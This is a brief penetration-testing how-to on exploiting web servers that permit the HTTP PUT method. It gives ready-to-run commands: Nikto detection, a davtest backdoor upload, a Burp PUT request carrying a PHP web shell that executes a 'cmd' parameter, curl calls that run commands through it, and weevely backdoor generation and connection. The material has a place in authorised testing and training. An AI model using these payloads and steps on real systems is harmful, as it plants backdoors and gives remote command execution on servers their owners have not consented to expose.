Detection of vulnerability

Run Nikto:

nikto --host <target ip>:<target port>

If it returns this:

+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.

You are potentially in business.

Use davtest to get a backdoor

This tool runs all of the payloads that it has, sends backdoors if exploitation is successful, and cleans up after itself.

davtest -url "http://${TARGET_IP}:${TARGET_PORT}" -sendbd auto -cleanup

PHP Backdoor with Burp

Capture a request and send it to repeater. Change the method to PUT and add some php code to the bottom of the request. It should look roughly like this:

PUT /test.php HTTP/1.1
Host: <target ip>:<target port>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 17 Feb 2017 22:27:30 GMT
If-None-Match: "18518f6-5a9-548c16b5e72ae"
Cache-Control: max-age=0
Content-Length: 50

<?php
echo exec($_GET[cmd]);
?>

If the backdoor is successfully landed, you can run commands on the underlying system:

$CMD=whoami
curl "http://${TARGET_IP}:${TARGET_PORT}/test.php?cmd=${CMD}"

Create a backdoor with weevely and upload it with poster

Start by downloading the poster addon for firefox.

Next, spawn a backdoor with weevely:

BACKDOOR_PW='evil'
BACKDOOR_PATH='/root/back.php'
weevely generate "${BACKDOOR_PW}" "${BACKDOOR_PATH}"

Go ahead and upload this shell using the PUT method with Poster by setting the following fields:

URL: http://<target ip>:<target port>/back.php
File: /root/back.php

and then clicking the PUT button.

Now access the backdoor like so:

weevely "http://${TARGET_IP}:${TARGET_PORT}/back.php" evil

Cleanup

Once you’re done, delete the backdoor using the DELETE method with Poster (specify DELETE in the dropdown and click the green button).

Resources: